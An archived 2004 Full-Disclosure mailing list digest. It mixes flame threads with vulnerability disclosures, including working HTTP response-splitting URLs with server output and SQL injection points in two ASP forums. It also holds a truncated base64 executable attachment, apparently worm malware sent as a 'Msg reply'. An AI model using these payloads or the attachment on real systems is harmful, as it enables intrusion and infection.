Full Disclosure mailing list archives
[Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs
From: "milw0rm Inc." <milw0rm () gmail com>
Date: Mon, 27 Sep 2004 13:12:10 -0500
JPEG GDI problem. Isn't this problem only capable of running if the jpeg was opened via the user's actions? Is it possible that webpages could be affected with jpegs with Internet Explorer viewing them? I wouldn't think so, since what I have read from multiple people's articles says that it isn't this kind of bug. Info needed.

Regards,
str0ke

On Mon, 27 Sep 2004 12:00:05 -0400, full-disclosure-request () lists netsys com <full-disclosure-request () lists netsys com> wrote:
Send Full-Disclosure mailing list submissions to
	full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
	http://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
	full-disclosure-request () lists netsys com

You can reach the person managing the list at
	full-disclosure-admin () lists netsys com

When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..."

Today's Topics:

   1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Exibar)
   2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Ron DuFresne)
   3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
   4. SANS GDIscan (bashis)
   5. HTTP Response Splitting and SQL injection in megabbs forum (pigrelax)
   6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
   7. Re: HTTP Response Splitting and SQL injection in megabbs forum (PD9 Software)
   8. Re: Re: HTTP Response Splitting and SQL injection in megabbs forum (DanB UK)
   9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
  10. Re: Windoze almost managed to 200x repeat 9/11 (Barry Fitzgerald)
  11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
  12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
  13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
  14. Re: Msg reply (Elvi)
  15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez)
  16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez)
  17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise (debian-security-announce () lists debian org)

--__--__--

Message: 1
From: "Exibar" <exibar () thelair com>
To: "ASB" <abaker () gmail com>, <full-disclosure () lists netsys com>
Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11
Date: Sun, 26 Sep 2004 12:15:26 -0400

Exactly. Some idiot decided to program the entire system to shut down after 49 days. What an idiot; why not just set up a maintenance program to perform a scheduled re-boot of the system instead of having an automated process shut down the system and then have to schedule a work-around for this by scheduling a manual boot every 30 days (which someone forgot). This whole thing wasn't Windows' fault, but an idiot programmer/manager/whatever's fault.

Exibar

-----Original Message-----
From: ASB [mailto:abaker () gmail com]
Sent: Sunday, September 26, 2004 10:56 AM
To: full-disclosure () lists netsys com
Subject: [inbox] Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.

-ASB

On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald <bkfsec () sdf lonestar org> wrote:
ASB wrote:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Where issues like this relate to the OS is in the fact that the OS itself shouldn't be brought down by a poorly designed app.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And where in that article did you read that the OS was brought down by a poorly designed app?
I didn't... I was responding to a point that was made about applications being responsible for system failures.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Was it MS Windows that actually held the code that brought the system down?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The article was pretty clear:
<snip>
How you managed to read "OS failure" into this is rather astounding...
How you manage to get up in the morning is rather astounding. Next time, please read the thread in context. Also, if you think that that's a detailed assessment of the problem, you're not too bright. So try and think a little harder next time, and not be so abrasive. You may be having a bad day (most likely due to your poor attitude) but don't take your own misunderstanding out on others, mmkay?

-Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 2
Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
From: Ron DuFresne <dufresne () winternet com>
To: Exibar <exibar () thelair com>
cc: ASB <abaker () gmail com>, <full-disclosure () lists netsys com>
Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

On Sun, 26 Sep 2004, Exibar wrote:

> Exactly. Some idiot decided to program the entire system to shut down after 49 days. What an idiot; why not just set up a maintenance program to perform a scheduled re-boot of the system instead of having an automated process shut down the system and then have to schedule a work-around for this by scheduling a manual boot every 30 days (which someone forgot).

Which, likely in this case, would have to somehow be monitored; seems to be a pretty critical application, one on which lives are dependent, and it is entirely possible the system might not recover from a reboot.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

--__--__--

Message: 3
From: "RandallM" <randallm () fidmail com>
To: <full-disclosure () lists netsys com>
Date: Sun, 26 Sep 2004 12:02:20 -0500
Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope?

What exactly would one gain by creating a PoC on this exploit? How exactly does this compare to meaningful disclosures that were revealed because someone would not listen or ignored the warnings of their security vulnerability? I mean, this is nothing like a program goof that allows clear-text passwords or exposes files or the like. This exploit (if it can be called that) took a lot of thought to create it and exploit it. Correct me if I'm wrong, but it does not fall into the category of "exploit" as defined by this list. This was truly a "created exploit" that would not be there otherwise. This took intelligent input. This is nothing more than a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list.

<|>--__--__--
<|>
<|>Message: 13
<|>From: "i.t " <fulldis () it97 dyndns org>
<|>Organization: i.t consulting
<|>To: full-disclosure () lists netsys com
<|>Date: Sun, 26 Sep 2004 11:57:33 +0200
<|>Subject: [Full-disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
<|>
<|>
<|>> On Saturday 25 September 2004 16:59, raza wrote:
<|>> > I just compiled this and it works well..
<|>> >
<|> ...
<|>> yes and it works very well.
<|>> > I can see this ones gaana be fun...
<|>> We'll have a worm within days.
<|>
<|>for nearly all of my clients using win xp I've deinstalled
<|>win messenger.
<|>one urgently wanted it back for communicating in real-time;
<|>and, of course,
<|>it's much more fun seeing a live picture of the
<|>counterpart(s) in the chat
<|>window...
<|>
<|>even having installed sp2 and the newest patches plus AV I
<|>can imagine a virus
<|>spreading within those pictures throughout the whole msn and so on...
<|>any other defense?
<|>or is this too much paranoia?
<|>
<|>i.t
<|>
<|>
<|>--__--__--

--__--__--

Message: 4
To: full-disclosure () lists netsys com
Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
From: bashis <mcw () wcd se>
Reply-To: mcw () wcd se
Subject: [Full-disclosure] SANS GDIscan

Hi

I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable DLLs after installing all available patches from M$..

WinXP Pro SP1
C:\WINDOWS\system32\gdiplus.dll
Version: 5.1.3097.0 <-- Vulnerable version

Win2k Server SP4
C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
Version: 5.1.3097.0 <-- Vulnerable version

[1] http://isc.sans.org/gdiscan.php

Have a nice day
/bashis

--__--__--

Message: 5
From: "pigrelax" <pigrelax () yandex ru>
To: <full-disclosure () lists netsys com>
Cc: <bugtraq () Securityfocus com>, <info () pd9soft com>
Date: Sun, 26 Sep 2004 21:56:44 +0400
Subject: [Full-disclosure] HTTP Response Splitting and SQL injection in megabbs forum

URL: http://www.pd9soft.com
Tested megabbs 2.1

1. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>

2. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>

3. More and more SQL injection:

ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'

MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). MaxPatrol developers were able quite simply to "ignore" about 40% of the newly published vulnerabilities because their product's intelligent algorithms had already detected them.
http://www.Maxpatrol.com

--__--__--

Message: 6
From: "pigrelax" <pigrelax () yandex ru>
To: <full-disclosure () lists netsys com>
Cc: <bugtraq () Securityfocus com>
Date: Mon, 27 Sep 2004 00:09:32 +0400
Subject: [Full-disclosure] SQL injection in BroadBoard Instant ASP Message Board

BroadBoard Instant ASP Message Board
URL: http://www.broadboard.com/

1. software does not properly validate user-supplied input in the 'keywords' parameter in search.asp:

http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL code]&method=1&method=1&body=1&subject=1&board=1&results=1

2. software does not properly validate user-supplied input in the 'handle' parameter in profile.asp:

http://broadboard/forum/profile.asp?handle=['SQL code]

3. software does not properly validate user-supplied input in the 'txtUserHandle' parameter in reg2.asp:

POST /forum/reg2.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

txtNameFirst=1&txtNameLast=1&txtUserEmail=sales () maxpatrol com&txtUserHandle=['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1

4. software does not properly validate user-supplied input in the 'txtUserEmail' parameter in forgot.asp:

POST /forum/forgot.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

txtUserEmail=['SQL code]&cmdSend=1

MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). MaxPatrol developers were able quite simply to "ignore" about 40% of the newly published vulnerabilities because their product's intelligent algorithms had already detected them.
http://www.Maxpatrol.com

--__--__--

Message: 7
Date: Sun, 26 Sep 2004 13:50:50 -0500
From: PD9 Software <info () pd9soft com>
CC: full-disclosure () lists netsys com, bugtraq () Securityfocus com
Subject: [Full-disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum

pigrelax wrote:
> URL: http://www.pd9soft.com
> Tested megabbs 2.1
> 1. HTTP Response Splitting
> 2. HTTP Response Splitting
> 3. More and more SQL injection:

All three issues have been addressed, and updates have been posted at http://www.pd9soft.com/. Thank you for bringing them to my attention. However, in the future, would it be too much to ask that I am contacted first? I am very eager to fix any security vulnerabilities, but sipping coffee on a lazy Sunday afternoon and seeing this broadcast to a public list is a little disconcerting.

Thanks,
Matt Summers
PD9 Software, Inc

--__--__--

Message: 8
Date: Sun, 26 Sep 2004 23:12:42 +0100
From: DanB UK <danbuk () gmail com>
Reply-To: DanB UK <danbuk () gmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum

It seems like the OP was actually just trying to advertise their (or affiliates') product. I would say that it's not the 'done' thing.

> However in the future, would it be too much to ask that I am contacted first? I am very eager to fix any security vulnerabilities, but sipping coffee on a lazy Sunday afternoon and seeing this broadcast to a public list is a little disconcerting.

I understand your concern.

Regards,
Daniel

--
DanB UK
London, UK

--__--__--

Message: 9
From: "joe" <mvp () joeware net>
To: "'devis'" <devis () easynix net>
Cc: <full-disclosure () lists netsys com>
Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat 9/11
Date: Sun, 26 Sep 2004 18:42:29 -0400

I get paid nothing to hang out on this list. In fact many of my friends feel I am wasting considerable time here because the vast majority of the people are Linux bigots simply holding each others', ummm, hands. Once in a while though some seriously good information or conversation occurs here, which is why I like to hang out, and most of my responses tend to be offlist. Occasionally I like to dampen some of the occasional this or that about how bad Windows sucks from people who don't know enough about how it works to even have a very good opinion. They are intelligent people mostly, they just have a hamster up their bum about billg or MS for some reason.

It is funny to me how this thread came onto the list as a "Windows sucks" thread when it should have been a serious "some programmers don't understand data types sucks" thread. It is poor programming habits like this that cause a great deal of the flaws in apps and OSes that others take advantage of.
Programmers need to understand the proper way to handle the datatypes they use in their applications, whether it be checking for data size constraints or data range constraints.

As for missing out on cash or something from MS, I am not so sure MS would have me as an employee at the moment as I spend considerable time banging on them and their OS and choices. I don't do it out in the public lists like this as I am trying to be a righteous d00d to all of you cool people. I bang on them in the private groups that have MS people seriously looking to make things better.

For this specific thread, my main point is that someone who can't figure out that an unsigned integer value that is incrementing will roll at some point is a dangerous programmer no matter what OS they are on. This has nothing to do with Windows or any OS. It is how computers work, period. There isn't a single OS out there on which you could constantly increment a 32 bit unsigned counter and not roll to zero. This is way below anything the OS can control. At best it halts the program as soon as the overflow kicks. That really wouldn't help much except possibly with data corruption. I don't think an OS should be protecting apps from data corruption due to the app losing count though.

joe

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of devis
Sent: Saturday, September 25, 2004 12:49 PM
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

Joe dude, how much u are getting from M$ a month to hang around this list? Zero? Noway....send em a letter now dude. And please don't serve me 'just being objective crap', you HAVE to be interested to defend it that well; if not, well, you may be missing on something...

joe wrote:
Definitely some interesting theories Ron.

1> the code was better done under the original OS, unix

While possible, nothing actually points at this as being the case. Anyway, I would be curious as to the functionality of the system when it was first launched on UNIX versus the end-result. Put this on Windows and run it 10 years and then port to UNIX or *nix and there will almost certainly be screwups there as well. In fact, I would be pretty confident. I have dealt with poor ports to and from Windows and *nix. I have even dealt with bad ports from Mainframes to UNIX where the whole time the Mainframe people were saying the same types of things about UNIX that you like to say about Windows. Being a good coder for one OS doesn't make you one for all OSes when dealing with system-level components and interfaces.

2> considering "how often" you seem to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS'

I would expect the issue is the same as always. Sheer volume. There are good and bad coders, period. Microsoft has surely drawn more poor coders than any other OS with its pushing of the RAD/simple coding environment such as VB. Additionally the Windows environment as a whole has more inexperienced users and admins and people likely to try and code. There are also many good ones as well, they are just well buried in the poor ones.

3> tools to code with in the windows realm are not as
3> developed/functional as they are in other envs

I would say this opinion is uninformed.

4> M$ does not properly provide developers with clued information with which to do their jobs

This is another opinion which I would call rather uninformed. Even if there was poor function documentation, if you have a function, any function, returning a constantly increasing counter you know, as a skilled programmer, that eventually it has to do something other than increase. If the value is signed the sign bit will flip, or if it is unsigned it will roll to 0. How can a good programmer think any other thing? The compiler could have inserted exception handling code but at best that is simply going to bounce the program out of a normal running state. That is a compiler thing though, not an OS thing. I do hope you aren't trying to tell me that UNIX can magically and infinitely maintain a counter on a variable with a fixed bit size. I try to consider you to be a bit more intelligent than that.

To put it another way, if you have a set of tires on a car that are rated for 75 MPH (say off road truck tires) and some person goes 90 and the tires fly apart or the vehicle flips or both, is the issue the driver, the vehicle manufacturer, the tire manufacturer, or the tree that produced the rubber for the tire? This is the same sort of case. You have it in your mind ahead of time who you want to be at fault because you have a bug up your bum about it and work to prove that stance.

Poor coding is a result of poor coders. I have seen amazingly bad code on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to Windows to DOS to VMS. I have also seen some amazingly good stuff on the same platforms. Someone who doesn't understand basic data types and how to handle their limits is going to do a shitty job on all of the platforms.

Is the ratio of good admins to bad admins better in UNIX versus Windows? Absolutely. Is the ratio of good programmers to bad programmers better in UNIX versus Windows? Most certainly. Does this mean all Windows admins are bad admins? Obviously not. Does this mean all Windows programmers are bad programmers? Obviously not. I specifically say UNIX versus *nix because I think *nix is one or more steps closer to Windows in this discussion and getting closer as its popularity grows with Windows users. Switching to *nix doesn't make the admins or coders switching (or just using in tandem) any better simply because they switched.

-----Original Message-----
From: Ron DuFresne [mailto:dufresne () winternet com]
Sent: Friday, September 24, 2004 11:25 PM
To: joe
Cc: mcw () wcd se; full-disclosure () lists netsys com
Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, 24 Sep 2004, joe wrote:

> Again, there are valid uses of GetTickCount and there are safe ways of doing so. If there is concern, I do recommend testing functionality associated with each of the DLLs. You might find a bug you can report for kudos.
>
> On the incident, I would guess the vendor never had a clue it would do that.
>
> That function can't return more than 49.7 days without breaking every app that currently uses it. MS can not do that. That is why there is another function to get the info with a different datatype. See my other posts.

What seems to read clearly from your replies to this thread is that either;

1> the code was better done under the original OS, unix
2> considering "how often" you seem to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS'
3> tools to code with in the windows realm are not as
3> developed/functional as they are in other envs
4> M$ does not properly provide developers with clued information with which to do their jobs

From which you can combine any or all of the above for a correct interpretation of the total of your replies.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 10
Date: Sun, 26 Sep 2004 20:41:34 -0400
From: Barry Fitzgerald <bkfsec () sdf lonestar org>
To: ASB <abaker () gmail com>
CC: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

ASB wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Next time, please read the thread in context.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.

Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here. My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut. I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise.

If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. Of course, you can't, so you've decided to just flame people.

Please re-read my posts and think before you respond. If, besides misreading my posts, you can find no argument with what I've said (which you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand.

-Barry

--__--__--

Message: 11
From: "Vince Able" <we_hate_vince () hotmail com>
To: <full-disclosure () lists netsys com>
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11
Date: Sun, 26 Sep 2004 21:24:27 -0400
Organization: The Ram Group

Well what a nice first post to read entering Full-Disclosure. LoL

----- Original Message -----
From: "Barry Fitzgerald" <bkfsec () sdf lonestar org>
To: "ASB" <abaker () gmail com>
Cc: <full-disclosure () lists netsys com>
Sent: Sunday, September 26, 2004 8:41 PM
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

> ASB wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Next time, please read the thread in context.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.
>
> Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here. My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut. I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise.
>
> If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. Of course, you can't, so you've decided to just flame people.
>
> Please re-read my posts and think before you respond. If, besides misreading my posts, you can find no argument with what I've said (which you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand.
>
> -Barry
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 12
Date: Sun, 26 Sep 2004 22:36:12 -0400
From: ASB <abaker () gmail com>
Reply-To: ASB <abaker () gmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat 9/11

There was more than enough information provided in the initial link, besides what was available to those who took a moment or 3 to search for additional info, to avoid coming to the conclusion that the OS was the fault here.

The mere fact that thousands, if not millions, of people manage to run Windows 2000 systems which do not keel over every 49.7 days would tend to cause one to look elsewhere for the source of the issue.

Beyond that, the wording of the various articles on this issue that I looked at made it rather obvious that there was an issue with the APPLICATION which rendered it useless if certain operator steps were not performed. No matter how scanty you feel the articles were, they never even implied that the OS was inoperable during any of this.

While it is certainly important to have as much information as possible before rendering verdicts of any sort, and while not every issue can be definitively outlined as jet black or lily white, there's not a whole lot more forensics that's needed to conclude that the root of the issue is one of application development, compounded by the failure of an operator to perform a prescribed workaround at the appointed time.

The irony here is that you're accusing me of not reading or comprehending.

-ASB

On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald <bkfsec () sdf lonestar org> wrote:
> ASB wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Next time, please read the thread in context.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.
>
> Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here. My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut. I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise.
>
> If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. Of course, you can't, so you've decided to just flame people.
>
> Please re-read my posts and think before you respond. If, besides misreading my posts, you can find no argument with what I've said (which you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand.
>
> -Barry

--__--__--

Message: 13
Date: Sun, 26 Sep 2004 22:20:29 -0700
From: r00t3d <r00t3d () gmail com>
Reply-To: r00t3d <r00t3d () gmail com>
To: randallm () fidmail com, full-disclosure () lists netsys com
Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope?

Dear RandallM,

> This exploit (if it can be called that) took a lot of thought to create it and exploit it.

Yea, lots of thought, and ripped shellcode to boot! Can't beat that, can ya?

> Correct me if I'm wrong but it does not fall into the category of "exploit" as defined by this list.

Okay, you're wrong.

> This was truly a "created Exploit"

Seriously? I didn't know exploits were "created". I always thought they just appeared.

> This is nothing more than a black-hat attack.
It is not a meaningful revealing of poor security as I've seen defined on this list.Uh oh, are the blaqhats after us again?? I think we had all better just pull our whitehats down over our heads and hope they go away. I hear, if you don't move, the blaqhats won't notice you and will leave, kind of like with bears. Anyways, last time I checked, it was't blaqhats that disclosed exploits, it was whitehats and scene whores. Love, #MSNetworks --__--__-- Message: 14 Date: Mon, 27 Sep 2004 09:03:35 +0200 To: "Full-disclosure" <full-disclosure () lists netsys com> From: "Elvi" <elvi52001 () yahoo com> Subject: [Full-disclosure] Re: Msg reply ----------tthzhwewredcturxosqp Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: 7bit <html><body> <br> </body></html> ----------tthzhwewredcturxosqp Content-Type: application/octet-stream; name="Loves_money.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Loves_money.exe" TVoAAAEAAAACAAAA//8AAEAAAAAAAAAAQAAAAAAAAAC0TM0hAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAkAAAAKkm3RPtR7NA7UezQO1Hs0DtR7NA7kezQGNYoEBtR7NAEWehQOxHs0AqQbVA 7EezQFJpY2jtR7NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwDMD5BAAAAAAAAA AADgAA8BCwEFDABQAAAAEAAAAJAAAPDiAAAAoAAAAPAAAAAAQAAAEAAAAAIAAAQAAAAAAAAA BAAAAAAAAAAAAAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AACk8wAATAIAAADwAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAABVUFgwAAAAAACQAAAAEAAAAAAAAAACAAAAAAAAAAAAAAAAAACAAADg VVBYMQAAAAAAUAAAAKAAAABGAAAAAgAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADw AAAABgAAAEgAAAAAAAAAAAAAAAAAAEAAAMAxLjI0AFVQWCEMCQIIvyc9X9rQb57HxwAAyUIA AACSAAAmAADM////m/rJOnEqKxiQ86MrEIn8ewjaeUIXGA5z7n9eUr/9//+6+gQ6jxg5r3EW rHG/8nGP9nG36hniLTsQ8sj83P+x3d8FO3H+Jsk4vBgSpDM49vora+237yoNKgWP6gL2qhI6 BQANGX/79gd5Pg6S+to1kPoSYTT6c78GPb//vsW+DoKQATDyEi26DXe/Aqr/m697KRIGFVN5 hwL6j/gR6QWPd2/ukQIOEmpbQw4RNQ8SqrrbNnNgRmqHDnf+arf23GbiWVqlyOxH8vi32d7f 
----------tthzhwewredcturxosqp--

--__--__--

Message: 15
Date: Mon, 27 Sep 2004 11:44:23 +0200
From: Thierry Carrez <koon () gentoo org>
Organization: Gentoo Linux
To: gentoo-announce () gentoo org
CC: bugtraq () securityfocus com, full-disclosure () lists netsys com, security-alerts () linuxsecurity com
Subject: [Full-disclosure] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigEA6620FABBD9968E5B2250AD
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200409-34
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: X.org, XFree86: Integer and stack overflows in libXpm
      Date: September 27, 2004
      Bugs: #64152
        ID: 200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libXpm, the X Pixmap library that is a part of the X Window System,
contains multiple stack and integer overflows that may allow a
carefully-crafted XPM file to crash applications linked against libXpm,
potentially allowing the execution of arbitrary code.

Background
==========

XFree86 and X.org are both implementations of the X Window System.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  x11-base/xorg-x11      < 6.7.0-r2                      *>= 6.7.0-r2
                            == 6.8.0                         >= 6.8.0-r1
  2  x11-base/xfree         < 4.3.0-r7                       >= 4.3.0-r7
    -------------------------------------------------------------------
    # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.

    NOTE: Any packages listed without architecture tags apply to all
          architectures...
    -------------------------------------------------------------------
    NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
          PPC and SPARC architectures: XFree86 users on those
          architectures should switch to X.org rather than upgrading
          XFree86.
    -------------------------------------------------------------------
     2 affected packages
    -------------------------------------------------------------------

Description
===========

Chris Evans has discovered multiple integer and stack overflow
vulnerabilities in the X Pixmap library, libXpm, which is a part of the
X Window System. These overflows can be exploited by the execution of a
malicious XPM file, which can crash applications that are dependent on
libXpm.

Impact
======

A carefully-crafted XPM file could crash applications that are linked
against libXpm, potentially allowing the execution of arbitrary code
